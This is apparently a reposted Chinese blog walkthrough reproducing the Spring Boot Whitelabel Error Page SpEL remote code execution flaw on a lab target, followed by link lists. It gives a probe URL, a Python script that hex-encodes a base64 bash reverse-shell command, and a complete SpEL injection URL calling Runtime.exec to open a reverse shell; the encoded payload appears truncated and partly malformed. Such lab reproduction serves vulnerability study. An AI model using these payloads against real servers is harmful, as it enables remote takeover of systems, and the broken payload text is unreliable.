Spring-boot远程代码执行Whitelabel Error Page spel rce复现

Others 2021-11-26 10:47:52 views: null

所有文章，仅供安全研究与学习之用，后果自负!

Spring-boot远程代码执行

Spring-boot远程代码执行Whitelabel Error Page spel rce复现

Spring-boot远程代码执行Whitelabel Error Page spel rce复现

0x01 漏洞描述

spring boot 处理参数值出错，流程进入 org.springframework.util.PropertyPlaceholderHelper 类中
此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。
其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行，造成 RCE 漏洞。

0x02 影响范围

spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0。
至少知道一个触发 springboot 默认错误页面的接口及参数名。

0x03 漏洞复现

（1）访问靶场
在这里插入图片描述
（2）漏洞探测

/article?id=${7*7}

http://vulfocus.fofa.so:31068/article?id=${7*7}

在这里插入图片描述
（3）利用脚本反弹shell

# coding: utf-8

result = ""
target = 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3Rjc}|{base64,-d}|{bash,-i}'
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))

在这里插入图片描述

http://vulfocus.fofa.so:31068/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x2b,0x4a,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x32d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d}))}

在这里插入图片描述

反弹shell成功

在这里插入图片描述

0x04 漏洞修复

升级至最新版本

参考

https://blog.csdn.net/lhh134/article/details/106795776

Guess you like

Origin blog.csdn.net/YouthBelief/article/details/121476462

Spring-boot远程代码执行Whitelabel Error Page spel rce复现

Spring-boot远程代码执行Whitelabel Error Page spel rce复现

whitelabel error page SpEL RCE vulnerability reproduction

spring boot "Whitelabel Error Page" No message available

Spring Boot Whitelabel Error Page problem solving

After the Spring boot configuration is successful, there Whitelabel Error Page solution

Spring Boot Primitive Rest Controller Returns Whitelabel Error Page

How to resolve the problem related to "Whitelabel Error Page" in a Spring Boot application

Spring Boot Whitelabel Error page (type=Not Found, status=404)

A strange error Whitelabel Error Page

Vue Whitelabel Error Page错误

Springboot Whitelabel Error Page problem

Spring Expression Language (SpEL)

Using Spring SpEL

Novice Whitelabel Error encountered Page Solutions

Whitelabel Error Page appears in Springboot (special

How to replace Springs whitelabel error page with a blank page?

spring of spring expression language: SpEL

Parsing spel expressions in Spring Aop

Introduction to the use of Spring (4) - SpEL

Spring Boot Cache SpEL (#result) Returns Null

Spring Boot SpEL ConditionalOnExpression check multiple properties

vulhub漏洞复现-gitea(1.4-rce) 目录穿越及命令执行

Spring mvc thymeleaf. How to show whitelabel error page as modal or popup or toast

Swagger with Spring Boot 2.0 leads to 404 error page

SpringBoot enters the controller method to jump to the html, and the Whitelabel Error Page appears

getting "Whitelabel Error Page" running actuator health and mappings urls

Gitlab远程代码执行漏洞复现CVE-2018-14364

Jenkins 远程代码执行漏洞（CVE-2017-1000353）复现

Whitelabel Error Page This application has no explicit mapping for /error, so you are seeing this as

Recommended

Rushing to the GitHub hot list——How can open source programming languages and frameworks be so cute?

Beijing Humanoid Robot Innovation Center launches Tiangong, the world's first full-size humanoid robot with purely electric drive for anthropomorphic running

Ranking

8个无需编写代码即可使用 Python 内置库的方法

Java collections interview knowledge Lite

Machine learning algorithms foundation - Introduction a (watermelon materials for the book)

(Easy) Ransom Note - LeetCode

[Five days] Qt from entry to actual combat: the second day

Remember once extremely pit father can not download Maven Jar package of issues: IDEA question

The minimum cost Shortest

OSPF study map (the most complete version)

Network Takeaways

GnuPG

Daily

More

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)

2024-04-23(30)

2024-04-22(5)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)